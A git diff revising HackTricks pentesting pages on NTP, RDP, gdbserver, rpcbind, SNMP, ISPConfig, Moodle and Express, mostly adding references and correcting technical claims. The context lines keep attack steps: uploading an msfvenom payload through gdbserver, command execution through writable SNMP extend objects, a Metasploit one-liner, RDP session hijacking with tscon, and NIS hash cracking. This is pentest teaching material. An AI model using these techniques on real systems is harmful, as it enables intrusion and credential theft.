-Look for self-signed or expired certificates and weak cipher-suites (non-AEAD). Reference: RFC 8915 §4.<sup>[[1]](#references)</sup> 
+Look for certificate-validation failures, unexpected trust anchors, missing `ntske/1` ALPN negotiation, and implementation-specific parsing failures. RFC 8915 requires TLS 1.3 or later for NTS-KE and separately negotiates an AEAD algorithm for protected NTP packets.<sup>[[1]](#references)</sup>
 
 ---
 ## Hardening / Best-Current-Practice (BCP-233 / RFC 8633)
@@ -155,10 +155,9 @@ port:4460 "ntske"         # NTS-KE
 
 | Tool | Purpose | Example |
 |------|---------|---------|
-| ``ntpwn`` | Script-kiddie wrapper to spray monlist & peers queries | ``python ntpwn.py --monlist targets.txt`` |
 | **zgrab2 ntp** | Mass scanning / JSON output including monlist flag<sup>[[10]](#references)</sup> | See command above |
 | ``chronyd`` with ``allow`` | Run rogue NTP server in pentest lab | ``chronyd -q 'server 127.127.1.0 iburst'`` |
-| ``BetterCap`` | Inject NTP packets for time-shift MITM on Wi-Fi | ``set arp.spoof.targets <victim>; set ntp.time.delta 30s; arp.spoof on`` |
+| Packet-crafting frameworks | Build or replay NTP packets in an authorized lab after establishing an on-path position | Validate the packet fields and timing effect with a capture |
 
 ---
 ## HackTricks Automatic Commands
@@ -187,13 +186,14 @@ Entry_2:
 
 - [1] [RFC 8915 – Network Time Security for the Network Time Protocol (port 4460)](https://www.rfc-editor.org/rfc/rfc8915)
 - [2] [RFC 8633 – Network Time Protocol BCP](https://www.rfc-editor.org/rfc/rfc8633)
-- [3] [Cloudflare – Record-breaking 5.6 Tbps DDoS attack and global DDoS trends for 2024 Q4](https://blog.cloudflare.com/ddos-threat-report-for-2024-q4/)
+- [3] [Cloudflare – Technical Details Behind a 400 Gbps NTP Amplification DDoS Attack](https://blog.cloudflare.com/technical-details-behind-a-400gbps-ntp-amplification-ddos-attack/)
 - [4] [Cloudflare Learning Center – NTP Amplification DDoS Attack](https://www.cloudflare.com/learning/ddos/ntp-amplification-ddos-attack/)
-- [5] [NVD – CVE-2023-26551 (ntp 4.2.8p15 out-of-bounds write series)](https://nvd.nist.gov/vuln/detail/CVE-2023-26551)
+- [5] [NTP Project – ntp-4.2.8 series changelog](https://www.ntp.org/support/securitynotice/4_2_8-series-changelog/)
 - [6] [NVD – CVE-2023-33192 (ntpd-rs NTS cookie denial of service)](https://nvd.nist.gov/vuln/detail/CVE-2023-33192)
 - [7] [SUSE – Recommended update for chrony (SUSE-RU-2024:2022-1)](https://www.suse.com/support/update/announcement/2024/suse-ru-20242022-1/)
 - [8] [RFC 9523 – A Secure Selection and Filtering Mechanism for the Network Time Protocol with Khronos](https://www.rfc-editor.org/rfc/rfc9523)
 - [9] [chrony project – chronyc(1) manual](https://chrony-project.org/doc/4.5/chronyc.html)
 - [10] [zgrab2 – ntp module](https://github.com/zmap/zgrab2/tree/master/modules/ntp)
+- [11] [chrony project – chrony.conf(5) source-selection directives](https://chrony-project.org/doc/4.5/chrony.conf.html)
 
 {{#include ../banners/hacktricks-training.md}}

--- a/src/network-services-pentesting/pentesting-rdp.md
+++ b/src/network-services-pentesting/pentesting-rdp.md
@@ -5,7 +5,7 @@
 
 ## Basic Information
 
-Developed by Microsoft, the **Remote Desktop Protocol** (**RDP**) is designed to enable a graphical interface connection between computers over a network. To establish such a connection, **RDP** client software is utilized by the user, and concurrently, the remote computer is required to operate **RDP** server software. This setup allows for the seamless control and access of a distant computer's desktop environment, essentially bringing its interface to the user's local device.
+Microsoft's **Remote Desktop Protocol** (**RDP**) carries graphical display, keyboard, mouse, clipboard, device-redirection, and virtual-channel traffic between a client and a Remote Desktop Session Host. Current Windows deployments should prefer TLS plus Credential Security Support Provider (CredSSP), commonly presented as Network Level Authentication (NLA), instead of the legacy native RDP security layer.<sup>[[3]](#references)</sup>
 
 **Default port:** 3389
 
@@ -22,7 +22,7 @@ PORT     STATE SERVICE
 nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 <IP>
 ```
 
-It checks the available encryption and DoS vulnerability (without causing DoS to the service) and obtains NTLM Windows info (versions).
+These scripts enumerate supported encryption, check the MS12-020 condition without deliberately triggering the denial of service, and obtain Windows information exposed through NTLM.<sup>[[4]](#references)</sup>
 
 ### Security Layer / NLA Checks
 
@@ -79,7 +79,7 @@ rdp_check <domain>/<name>:<password>@<IP>
 
 ### Session stealing
 
-With **SYSTEM permissions** you can access any **opened RDP session by any user** without need to know the password of the owner.
+With the required **Full Control** or **Connect** permission on an RD Session Host, `tscon` can connect one session to another. A SYSTEM context may possess sufficient local rights in common post-exploitation scenarios, but the documented authorization check still matters.<sup>[[5]](#references)</sup>
 
 **Get openned sessions:**
 
@@ -93,9 +93,9 @@ query user
 tscon <ID> /dest:<SESSIONNAME>
 ```
 
-Now you will be inside the selected RDP session and you will have impersonate a user using only Windows tools and features.
+The destination session disconnects and is connected to the selected target session. This gives interactive access to that desktop through built-in Windows functionality.
 
-**Important**: When you access an active RDP sessions you will kickoff the user that was using it.
+**Important:** Connecting to an active session can disconnect the user or the current destination session, so expect visible operational impact.<sup>[[5]](#references)</sup>
 
 You could get passwords from the process dumping it, but this method is much faster and led you interact with the virtual desktops of the user (passwords in notepad without been saved in disk, other RDP sessions opened in other machines...)
 
@@ -142,7 +142,7 @@ xfreerdp /u:<user> /v:<IP> /rdp2tcp:/path/to/rdp2tcp/client/rdp2tcp
 
 ### Sticky-keys & Utilman
 
-Combining this technique with **stickykeys** or **utilman you will be able to access a administrative CMD and any RDP session anytime**
+Combining session access with an existing **Sticky Keys** or **Utilman** backdoor can expose an administrative command prompt at the sign-in screen. Treat these file-replacement techniques as persistent, detectable system modifications.
 
 You can search RDPs that have been backdoored with one of these techniques already with: [https://github.com/linuz/Sticky-Keys-Slayer](https://github.com/linuz/Sticky-Keys-Slayer)
 
@@ -165,7 +165,7 @@ net localgroup "Remote Desktop Users" UserLoginName /add
 
 - [**AutoRDPwn**](https://github.com/JoelGMSec/AutoRDPwn)
 
-**AutoRDPwn** is a post-exploitation framework created in Powershell, designed primarily to automate the **Shadow** attack on Microsoft Windows computers. This vulnerability (listed as a feature by Microsoft) allows a remote attacker to **view his victim's desktop without his consent**, and even control it on demand, using tools native to the operating system itself.
+**AutoRDPwn** is a PowerShell post-exploitation framework that automates RDP shadowing. Shadowing is an administrative feature, and no-consent control depends on privileges and the Remote Desktop Services policy; abuse of that configuration lets an operator view or control another user's desktop with native tooling.<sup>[[1]](#references)[[6]](#references)</sup>
 
 - [**EvilRDP**](https://github.com/skelsec/evilrdp)
   - Control mouse and keyboard in an automated way from command line
@@ -203,6 +203,10 @@ Entry_2:
 ## References
 
 - [1] [Remote Desktop Services Shadowing – Beyond the Shadowed Session](https://swarm.ptsecurity.com/remote-desktop-services-shadowing/)
-- [2] [RDP tunneling with rdp2tcp](https://www.errno.fr/rdptunneling/)
+- [2] [V-E-O/rdp2tcp - TCP tunneling over RDP virtual channels](https://github.com/V-E-O/rdp2tcp)
+- [3] [Microsoft Learn - Remote Desktop Services overview](https://learn.microsoft.com/en-us/windows-server/remote/remote-desktop-services/overview)
+- [4] [Nmap NSE - rdp-enum-encryption](https://nmap.org/nsedoc/scripts/rdp-enum-encryption.html)
+- [5] [Microsoft Learn - tscon](https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/tscon)
+- [6] [Microsoft Learn - Shadow a Terminal Server session](https://learn.microsoft.com/en-us/troubleshoot/windows-server/remote/shadow-terminal-server-session)
 
 {{#include ../banners/hacktricks-training.md}}

--- a/src/network-services-pentesting/pentesting-remote-gdbserver.md
+++ b/src/network-services-pentesting/pentesting-remote-gdbserver.md
@@ -1,19 +1,19 @@
-# Pentesting Remote GdbServer
+# Pentesting Remote gdbserver
 
 {{#include ../banners/hacktricks-training.md}}
 
 
 ## **Basic Information**
 
-**gdbserver** is a tool that enables the debugging of programs remotely. It runs alongside the program that needs debugging on the same system, known as the "target." This setup allows the **GNU Debugger** to connect from a different machine, the "host," where the source code and a binary copy of the debugged program are stored. The connection between **gdbserver** and the debugger can be made over TCP or a serial line, allowing for versatile debugging setups.
+**gdbserver** enables remote debugging of programs on a target system from a host running GDB. GDB and gdbserver communicate over the remote serial protocol, commonly over TCP or a serial device. The host should use executable and library files that exactly match the target when it needs reliable symbols and debugging behavior.<sup>[[2]](#references)[[3]](#references)</sup>
 
-You can make a **gdbserver listen in any port** and at the moment **nmap is not capable of recognising the service**.
+gdbserver can listen on an operator-selected TCP port, so service detection may not consistently label it on a nonstandard endpoint. Confirm suspected services manually. Crucially, gdbserver has **no built-in authentication or transport security**: a connected debugger operates with the privileges of the account running gdbserver, so exposing it to an untrusted network is effectively exposing process control.<sup>[[2]](#references)</sup>
 
 ## Exploitation
 
 ### Upload and Execute
 
-You can easily create an **elf backdoor with msfvenom**, upload it and execute is:
+If an exposed server accepts `target extended-remote` sessions and permits starting a new program, an authorized tester can create an **ELF payload with msfvenom**, upload it, and execute it. `remote put` depends on remote file-I/O support, while `run` in extended-remote mode uses `set remote exec-file` to select the target-side executable.<sup>[[3]](#references)[[4]](#references)</sup>
 
 ```bash
 # Trick shared by @B1n4rySh4d0w
@@ -23,7 +23,7 @@ chmod +x binary.elf
 
 gdb binary.elf
 
-# Set remote debuger target
+# Set remote debugger target
 target extended-remote 10.10.10.11:1337
 
 # Upload elf file
@@ -40,7 +40,7 @@ run
 
 ### Execute arbitrary commands
 
-There is another way to **make the debugger execute arbitrary commands via a** [**python custom script taken from here**](https://stackoverflow.com/questions/26757055/gdbserver-execute-shell-commands-of-the-target).<sup>[[1]](#references)</sup>
+Another approach makes the inferior call `fork`, `execl`, and libc file functions through a [custom GDB Python command](https://stackoverflow.com/questions/26757055/gdbserver-execute-shell-commands-of-the-target). It requires the relevant symbols/functions, a usable `/bin/sh`, permission to fork/exec, and a target state in which GDB can call inferior functions.<sup>[[1]](#references)[[3]](#references)</sup>
 
 ```bash
 # Given remote terminal running `gdbserver :2345 ./remote_executable`, we connect to that server.
@@ -183,5 +183,8 @@ RemoteCmd()
 ## References
 
 - [1] [Stack Overflow – gdbserver: execute shell commands of the target](https://stackoverflow.com/questions/26757055/gdbserver-execute-shell-commands-of-the-target)
+- [2] [GNU GDB manual - Using the `gdbserver` program](https://sourceware.org/gdb/current/onlinedocs/gdb.html/Server.html)
+- [3] [GNU GDB manual - Connecting to a remote target](https://sourceware.org/gdb/current/onlinedocs/gdb.html/Connecting.html)
+- [4] [GNU GDB manual - File transfer (`remote put` and `remote get`)](https://sourceware.org/gdb/current/onlinedocs/gdb.html/File-Transfer.html)
 
 {{#include ../banners/hacktricks-training.md}}

--- a/src/network-services-pentesting/pentesting-rpcbind.md
+++ b/src/network-services-pentesting/pentesting-rpcbind.md
@@ -5,9 +5,9 @@
 
 ## Basic Information
 
-**Portmapper** is a service that is utilized for mapping network service ports to **RPC** (Remote Procedure Call) program numbers. It acts as a critical component in **Unix-based systems**, facilitating the exchange of information between these systems. The **port** associated with **Portmapper** is frequently scanned by attackers as it can reveal valuable information. This information includes the type of **Unix Operating System (OS)** running and details about the services that are available on the system. Additionally, **Portmapper** is commonly used in conjunction with **NFS (Network File System)**, **NIS (Network Information Service)**, and other **RPC-based services** to manage network services effectively.
+**rpcbind** (historically portmapper) maps ONC RPC program/version numbers to the transport addresses on which their services listen. Enumerating it can reveal NFS, NIS/YP, mountd, rusersd, and vendor-specific RPC programs, although the program list alone does not reliably identify the operating-system version.<sup>[[4]](#references)</sup>
 
-**Default port:** 111/TCP/UDP, 32771 in Oracle Solaris
+**Default port:** 111/TCP and 111/UDP. Individual RPC programs may use fixed or dynamically assigned high ports; do not treat a historical Solaris high port such as 32771 as a universal rpcbind default.<sup>[[4]](#references)</sup>
 
 ```
 PORT    STATE SERVICE
@@ -17,7 +17,7 @@ PORT    STATE SERVICE
 ## Enumeration
 
 ```
-rpcinfo irked.htb
+rpcinfo -p irked.htb
 nmap -sSUC -p111 192.168.10.1
 ```
 
@@ -104,7 +104,9 @@ grep ':\$5\$' nis-hashes.txt   # SHA256Crypt
 grep ':\$6\$' nis-hashes.txt   # SHA512Crypt
 
 john --format=md5crypt nis-hashes.txt
-hashcat -m 500 nis-hashes.txt <wordlist>
+hashcat --username -m 500 nis-hashes.txt <wordlist>
+hashcat --username -m 7400 nis-hashes.txt <wordlist>  # $5$ SHA256Crypt
+hashcat --username -m 1800 nis-hashes.txt <wordlist>  # $6$ SHA512Crypt
 ```
 
 - Hashes beginning with **`$1$`** are **MD5Crypt** (Hashcat **`-m 500`**).
@@ -137,7 +139,7 @@ You could enumerate users of the box. To learn how read [1026 - Pentesting Rsuse
 
 ## Bypass Filtered Portmapper port
 
-When conducting a **nmap scan** and discovering open NFS ports with port 111 being filtered, direct exploitation of these ports is not feasible. However, by **simulating a portmapper service locally and creating a tunnel from your machine** to the target, exploitation becomes possible using standard tools. This technique allows for bypassing the filtered state of port 111, thus enabling access to NFS services. For detailed guidance on this method, refer to the article available at [this link](https://medium.com/@sebnemK/how-to-bypass-filtered-portmapper-port-111-27cee52416bc).<sup>[[3]](#references)</sup>
+For NFSv2/v3, client tools often need rpcbind plus auxiliary services such as `mountd`; if port 111 is filtered but those discovered service ports are reachable through a pivot, a local rpcbind shim and port forwards can make standard clients usable.<sup>[[3]](#references)</sup> NFSv4 normally uses TCP/2049 directly, so first determine the negotiated NFS version before building this workaround.
 
 
 ## Labs to practice
@@ -149,7 +151,7 @@ When conducting a **nmap scan** and discovering open NFS ports with port 111 bei
 
 ```
 Protocol_Name: Portmapper    #Protocol Abbreviation if there is one.
-Port_Number:  43     #Comma separated if there is more than one.
+Port_Number:  111
 Protocol_Description: PM or RPCBind        #Protocol Abbreviation Spelled out
 
 Entry_1:
@@ -163,7 +165,7 @@ Entry_1:
 Entry_2:
   Name: rpc info
   Description: May give netstat-type info
-  Command: whois -h {IP} -p 43 {Domain_Name} && echo {Domain_Name} | nc -vn {IP} 43
+  Command: rpcinfo -p {IP}
 
 Entry_3:
   Name: nmap
@@ -176,5 +178,6 @@ Entry_3:
 - [1] [Nmap NSE: rpc-grind](https://nmap.org/nsedoc/scripts/rpc-grind.html)
 - [2] [NetSPI - Legacy Meets Modern: Breaking AD Through NIS & MFA Infrastructure](https://www.netspi.com/blog/technical-blog/network-pentesting/legacy-meets-modern-breaking-ad-through-nis-mfa-infrastructure/)
 - [3] [How to Bypass Filtered Portmapper Port 111](https://medium.com/@sebnemK/how-to-bypass-filtered-portmapper-port-111-27cee52416bc)
+- [4] [RFC 1833 - Binding Protocols for ONC RPC Version 2](https://www.rfc-editor.org/rfc/rfc1833)
 
 {{#include ../banners/hacktricks-training.md}}

--- a/src/network-services-pentesting/pentesting-snmp/cisco-snmp.md
+++ b/src/network-services-pentesting/pentesting-snmp/cisco-snmp.md
@@ -8,7 +8,7 @@
 **SNMP** functions over UDP with ports **161/UDP** for general messages and **162/UDP** for trap messages. This protocol relies on *community strings*, serving as plaintext "passwords" that enable communication between SNMP agents and managers. These strings determine the access level, specifically **read-only (RO) or read-write (RW) permissions**.
 
 A classic--yet still extremely effective--attack vector is to **brute-force community strings** in order to elevate from unauthenticated user to device administrator (RW community).  
-A practical tool for this task is [**onesixtyone**](https://github.com/trailofbits/onesixtyone):
+A practical tool for this task is **onesixtyone**:<sup>[[8]](#references)</sup>
 
 ```bash
 onesixtyone -c community_strings.txt -i targets.txt
@@ -114,12 +114,12 @@ Exploitability still depends on possessing the community string or v3 credential
 ## Hardening & Detection tips
 
 * Upgrade to a fixed IOS/IOS-XE version (see Cisco advisory for the CVEs above).
-* Prefer **SNMPv3** with `authPriv` (SHA-256/AES-256) over v1/v2c.  
+* Prefer **SNMPv3** with `authPriv` over v1/v2c. On IOS XE releases that support SHA-2, use `sha-2 256` (or stronger) rather than the older `sha` keyword, which denotes SHA-1; choose the strongest privacy algorithm supported by both the device and the NMS.<sup>[[9]](#references)</sup>
   ```
   snmp-server group SECURE v3 priv
-  snmp-server user monitor SECURE v3 auth sha <authpass> priv aes 256 <privpass>
+  snmp-server user monitor SECURE v3 auth sha-2 256 <authpass> priv aes 256 <privpass>
   ```
-* Bind SNMP to a management VRF and **restrict with standard named or numbered IPv4 ACLs only**. Do **not** rely on extended named IPv4 ACLs for SNMP (CVE-2024-20373).<sup>[[7]](#references)</sup>
+* Bind SNMP to a management VRF and restrict it with a supported ACL type. On releases affected by CVE-2024-20373, extended named IPv4 ACLs could be attached but not enforced; patch the device or use a standard named/numbered ACL until it is fixed.<sup>[[7]](#references)</sup>
 * If you use SNMPv3 user-level ACLs, validate the serialized `snmp-server user` line after save/reload. Long auth/priv/ACL combinations can exceed the 255-character limit and silently drop the ACL on reboot (CVE-2025-20151). On newer IOS XE releases, re-create those users with type 6 encryption.<sup>[[6]](#references)</sup>
 * Disable **RW communities**; if operationally required, limit them with ACL and views:  
   `snmp-server community <string> RW 99 view SysView`
@@ -140,5 +140,7 @@ Exploitability still depends on possessing the community string or v3 credential
 - [5] [Cisco Security Advisory: Cisco IOS, IOS XE, and IOS XR Software SNMP Denial of Service Vulnerabilities (CVE-2025-20169 to CVE-2025-20176)](https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-snmp-dos-sdxnSUcW)
 - [6] [Cisco Security Advisory: Cisco IOS and IOS XE Software SNMPv3 Configuration Restriction Vulnerability (CVE-2025-20151)](https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-snmpv3-qKEYvzsy)
 - [7] [Cisco Security Advisory: Cisco IOS and IOS XE Software SNMP IPv4 Access Control List Bypass Vulnerability (CVE-2024-20373)](https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-snmp-uwBXfqww)
+- [8] [Trail of Bits - onesixtyone](https://github.com/trailofbits/onesixtyone)
+- [9] [Cisco IOS XE - AES and SHA-2 support for SNMPv3](https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/snmp/configuration/xe-17-x/snmp-xe-17-book/nm-snmp-encrypt-snmp-support.html)
 
 {{#include ../../banners/hacktricks-training.md}}

--- a/src/network-services-pentesting/pentesting-snmp/snmp-rce.md
+++ b/src/network-services-pentesting/pentesting-snmp/snmp-rce.md
@@ -2,7 +2,7 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-SNMP can be exploited by an attacker if the administrator overlooks its default configuration on the device or server. By **abusing SNMP community with write permissions (rwcommunity)** on a Linux operating system, the attacker can execute commands on the server.<sup>[[2]](#references)</sup>
+On Net-SNMP, a community string or SNMPv3 user with write access to the wrong OIDs can be much more dangerous than simple configuration tampering. If `NET-SNMP-EXTEND-MIB` is writable, an attacker can create an extension command that the agent executes with the `snmpd` process's privileges.<sup>[[1]](#references)[[2]](#references)</sup>
 
 This technique is mainly about **Net-SNMP** systems exposing **`NET-SNMP-EXTEND-MIB`** with a community/user allowed to **write** into the tree.
 
@@ -76,7 +76,7 @@ snmpset -m +NET-SNMP-EXTEND-MIB -v2c -c SuP3RPrivCom90 10.129.2.26 \
 'nsExtendRunType."oneshot"' = run-command
 ```
 
-The output is cached by default for **5 seconds**. Newly created rows are **`volatile`** by default (they do not survive agent restarts), while statically configured `extend` entries usually appear as **`permanent`**. If you need fresh output for every query, set **`nsExtendCacheTime`** to **`-1`**:
+The output is cached by default for **5 seconds**. Newly created rows are **`volatile`** by default (they do not survive agent restarts), while statically configured `extend` entries usually appear as **`permanent`**. Setting **`nsExtendCacheTime`** to **`-1`** disables caching, but note that reading each individual output object can then execute the command again.<sup>[[1]](#references)</sup>
 
 ```bash
 snmpset -m +NET-SNMP-EXTEND-MIB -v2c -c SuP3RPrivCom90 10.129.2.26 \
@@ -112,7 +112,7 @@ Interactive-ish shell:
 rlwrap python3 shell.py <IP> -c <COMMUNITY>
 ```
 
-If you need to push a longer payload (for example an SSH public key), the project also ships a **`legacy.py`** helper because the SNMP writeable string length is usually the limiting factor.
+If you need to push a longer payload (for example, an SSH public key), the project also ships a **`legacy.py`** helper because writable SNMP string length is usually the limiting factor.
 
 Or a reverse shell:
 
@@ -122,7 +122,7 @@ snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c SuP3RPrivCom90 10.129.2.26 'nsExtendSta
 
 ## Other Useful Tooling
 
-Metasploit contains **`exploit/linux/snmp/net_snmpd_rw_access`**, which is useful when you want an automated payload stager instead of manually fighting SNMP string length constraints:
+Metasploit contains **`exploit/linux/snmp/net_snmpd_rw_access`**, which automates staging through writable extend objects when the target configuration permits it:<sup>[[4]](#references)</sup>
 
 ```bash
 msfconsole -q -x 'use exploit/linux/snmp/net_snmpd_rw_access; set RHOSTS <IP>; set COMMUNITY <COMMUNITY>; run'
@@ -137,5 +137,6 @@ This is still a current attack path and not only an old lab trick. In **June 202
 - [1] [NET-SNMP-EXTEND-MIB definition](https://www.net-snmp.org/docs/mibs/NET-SNMP-EXTEND-MIB.txt)
 - [2] [Rio Asmara - SNMP Arbitrary Command Execution and Shell](https://rioasmara.com/2021/02/05/snmp-arbitary-command-execution-and-shell/)
 - [3] [Toshiba MFP: 40+ vulnerabilities (pre-auth root RCE via SNMP)](https://pierrekim.github.io/blog/2024-06-27-toshiba-mfp-40-vulnerabilities.html)
+- [4] [Rapid7 Metasploit - Net-SNMPd write-access code execution](https://www.rapid7.com/db/modules/exploit/linux/snmp/net_snmpd_rw_access/)
 
 {{#include ../../banners/hacktricks-training.md}}

--- a/src/network-services-pentesting/pentesting-web/ispconfig.md
+++ b/src/network-services-pentesting/pentesting-web/ispconfig.md
@@ -6,7 +6,7 @@
 
 ISPConfig is an open-source hosting control panel. Older 3.2.x builds shipped a language file editor feature that, when enabled for the super administrator, allowed arbitrary PHP code injection via a malformed translation record. This can yield RCE in the web server context and, depending on how PHP is executed, privilege escalation.<sup>[[1]](#references)[[2]](#references)[[7]](#references)</sup>
 
-Key default paths:
+Common paths in the documented installation and lab setup include:<sup>[[4]](#references)</sup>
 - Web root often at `/var/www/ispconfig` when served with `php -S` or via Apache/nginx.
 - Admin UI reachable on the HTTP(S) vhost (sometimes bound to localhost only; use SSH port-forward if needed).
 
@@ -99,7 +99,7 @@ python3 cve-2023-46818.py http://127.0.0.1:9001 admin <password>
 
 ### Metasploit module (released July 2025)
 
-Rapid7 added `exploit/linux/http/ispconfig_lang_edit_php_code_injection`, which can auto-enable `admin_allow_langedit` if the supplied admin account has system-config rights.<sup>[[6]](#references)</sup>
+Rapid7 added `exploit/linux/http/ispconfig_lang_edit_php_code_injection`. It checks `admin_allow_langedit` and attempts to enable it when disabled, which requires administrator credentials with system-configuration access.<sup>[[6]](#references)</sup>
 
 ```text
 use exploit/linux/http/ispconfig_lang_edit_php_code_injection
@@ -132,7 +132,7 @@ admin_allow_langedit=no
 - [3] [bipbopbup/CVE-2023-46818-python-exploit](https://github.com/bipbopbup/CVE-2023-46818-python-exploit)
 - [4] [HTB Nocturnal: Root via ISPConfig language editor RCE](https://0xdf.gitlab.io/2025/08/16/htb-nocturnal.html)
 - [5] [ISPConfig 3.3.0p2 Released – Security Update](https://www.ispconfig.org/blog/ispconfig-3-3-0p2-released-security-update/)
-- [6] [CXSecurity WLB-2025070017 – Metasploit module for ISPConfig language_edit.php](https://cxsecurity.com/issue/WLB-2025070017)
+- [6] [Rapid7 Vulnerability Database - ISPConfig `language_edit.php` PHP Code Injection](https://www.rapid7.com/db/modules/exploit/linux/http/ispconfig_lang_edit_php_code_injection/)
 - [7] [ISPConfig <= 3.2.11 (language_edit.php) PHP Code Injection Vulnerability (KIS-2023-13, original advisory by Egidio Romano)](https://karmainsecurity.com/KIS-2023-13)
 
 {{#include ../../banners/hacktricks-training.md}}

--- a/src/network-services-pentesting/pentesting-web/moodle.md
+++ b/src/network-services-pentesting/pentesting-web/moodle.md
@@ -4,6 +4,8 @@
 
 ## Automatic Scans
 
+Automatic scanners are primarily useful for fingerprinting. Confirm their version candidates manually, then compare the installed core and plugins with both Moodle's official security announcements and a package-oriented vulnerability tracker such as Snyk.<sup>[[5]](#references)[[7]](#references)</sup>
+
 ### droopescan
 
 `droopescan` fingerprints Moodle versions and plugins from exposed files and paths; treat its version candidates as hypotheses to confirm manually.<sup>[[3]](#references)</sup>
@@ -184,5 +186,6 @@ find / -name "config.php" 2>/dev/null | grep "moodle/config.php"
 - [4] [moodlescan project](https://github.com/inc0d3/moodlescan)
 - [5] [Moodle - Security announcements](https://moodle.org/security/)
 - [6] [MoodleDocs - Installing plugins](https://docs.moodle.org/en/Installing_plugins)
+- [7] [Snyk - Moodle package vulnerabilities](https://security.snyk.io/package/composer/moodle%2Fmoodle)
 
 {{#include ../../banners/hacktricks-training.md}}

--- a/src/network-services-pentesting/pentesting-web/moodle.md
+++ b/src/network-services-pentesting/pentesting-web/moodle.md
@@ -6,6 +6,8 @@
 
 ### droopescan
 
+`droopescan` fingerprints Moodle versions and plugins from exposed files and paths; treat its version candidates as hypotheses to confirm manually.<sup>[[3]](#references)</sup>
+
 ```bash
 pip3 install droopescan
 droopescan scan moodle -u http://moodle.example.com/<moodle_path>/
@@ -28,6 +30,8 @@ Admin panel - [http://moodle.schooled.htb/moodle/login/](http://moodle.schooled.
 ```
 
 ### moodlescan
+
+The community `moodlescan` project uses version artifacts and its own vulnerability database; refresh that database before scanning.<sup>[[4]](#references)</sup>
 
 ```bash
 # Install from https://github.com/inc0d3/moodlescan
@@ -78,7 +82,7 @@ cmsmap http://moodle.example.com/<moodle_path>
 
 ### CVEs
 
-Automatic tools are mostly useful for **fingerprinting**. They are usually **not enough to prove exploitability** on modern Moodle deployments, so verify findings manually and cross-check the version in the [official security feed](https://moodle.org/security/) or in [Snyk's Moodle package tracker](https://snyk.io/vuln/composer:moodle%2Fmoodle).
+Automatic tools are mostly useful for **fingerprinting**. They are usually **not enough to prove exploitability** on modern Moodle deployments, so verify findings manually and cross-check the version against Moodle's official security announcements.<sup>[[5]](#references)</sup>
 
 ## Manual Enumeration
 
@@ -102,7 +106,7 @@ Interesting targets during recon:
 
 ### Plugin upload (manager/admin)
 
-If you have a **manager**-level account and you **can install plugins**, go to the **"Site administration"** tab:
+If your account has the `moodle/site:config` capability and plugin installation is enabled, open **Site administration** and use the plugin installer. The standard Manager role does not necessarily have this capability, so test effective permissions instead of relying only on the displayed role name.<sup>[[6]](#references)</sup>
 
 ![CVEs - RCE: You need to have manager role and you can install plugins inside the "Site administration" tab](<../../images/image (630).png>)
 
@@ -176,5 +180,9 @@ find / -name "config.php" 2>/dev/null | grep "moodle/config.php"
 
 - [1] [RedTeam Pentesting - Exploiting a Remote Code Execution Vulnerability in Moodle](https://blog.redteam-pentesting.de/2024/moodle-rce/)
 - [2] [Quarkslab - Auditing Moodle's core hunting for logical bugs](https://blog.quarkslab.com/auditing-moodles-core-hunting-for-logical-bugs.html)
+- [3] [droopescan project](https://github.com/SamJoan/droopescan)
+- [4] [moodlescan project](https://github.com/inc0d3/moodlescan)
+- [5] [Moodle - Security announcements](https://moodle.org/security/)
+- [6] [MoodleDocs - Installing plugins](https://docs.moodle.org/en/Installing_plugins)
 
 {{#include ../../banners/hacktricks-training.md}}

--- a/src/network-services-pentesting/pentesting-web/nodejs-express.md
+++ b/src/network-services-pentesting/pentesting-web/nodejs-express.md
@@ -16,14 +16,14 @@ When you confirm Express, focus on the middleware chain, because most interestin
 
 ## Cookie Signature
 
-The tool [https://github.com/DigitalInterruption/cookie-monster](https://github.com/DigitalInterruption/cookie-monster) is a utility for automating the testing and re-signing of Express.js cookie secrets.
+The `cookie-monster` tool automates testing candidate Express.js cookie secrets and re-signing cookie values once a secret is known.<sup>[[3]](#references)</sup>
 
 Express commonly exposes two useful cookie formats:
 
 - `s:<value>.<sig>` signed cookies handled by `cookie-parser` or `express-session`
 - `j:<json>` JSON cookies that are automatically parsed by `cookie-parser`
 
-If `cookie-parser` receives a signed cookie and the signature is invalid, the value becomes `false` instead of the tampered value. If the application accepts an array of secrets, old secrets may still verify existing cookies after rotation.
+If `cookie-parser` receives a signed cookie and its signature is invalid, the unsigned value becomes `false` rather than the attacker-supplied string. When the application supplies an array of secrets, verification tries each secret in order, so retained rotation keys continue to validate old signatures.<sup>[[4]](#references)</sup>
 
 ### Single cookie with a specific name
 
@@ -142,8 +142,8 @@ Useful checks:
 
 - **Session fixation**: authenticate with a pre-login cookie and verify whether the SID stays the same after login
 - **Weak secret rotation**: some deployments verify cookies with an array of old secrets, so previously valid signatures may continue to work
-- **`saveUninitialized: true`**: the application issues pre-auth sessions to anonymous users, which makes fixation easier and increases session surface for brute-force or cache analysis
-- **`MemoryStore`** in production usually indicates weak operational maturity and unstable session behavior during restarts
+- **`saveUninitialized: true`**: the application stores new but unmodified sessions, increasing anonymous session volume. It does not create fixation by itself, but it supplies pre-authentication SIDs that make a failure to rotate the SID easier to test.
+- **`MemoryStore`** is intentionally unsuitable for production: it leaks memory under many workloads, does not scale beyond one process, and loses sessions on restart.<sup>[[5]](#references)</sup>
 
 A practical fixation workflow:
 
@@ -152,7 +152,7 @@ A practical fixation workflow:
 3. Check whether login binds the authenticated state to the existing SID.
 4. If it does, replay the same cookie in a separate browser session.
 
-If the app does not call `req.session.regenerate()` after authentication, fixation is often still possible.
+If the application does not rotate or regenerate the session after authentication, test whether authenticated state remains bound to a SID chosen or learned before login. `req.session.regenerate()` is the middleware's built-in rotation primitive.<sup>[[5]](#references)</sup>
 
 ## Method Override Tunneling
 
@@ -183,11 +183,15 @@ Interesting impacts:
 - Bypassing route-specific middleware that only checks `req.method`
 - Triggering state-changing handlers via CSRF when the application validates only the outer request method
 
-By default the middleware usually only overrides `POST`, so prioritize `POST` requests with header, body, and query-string override values.
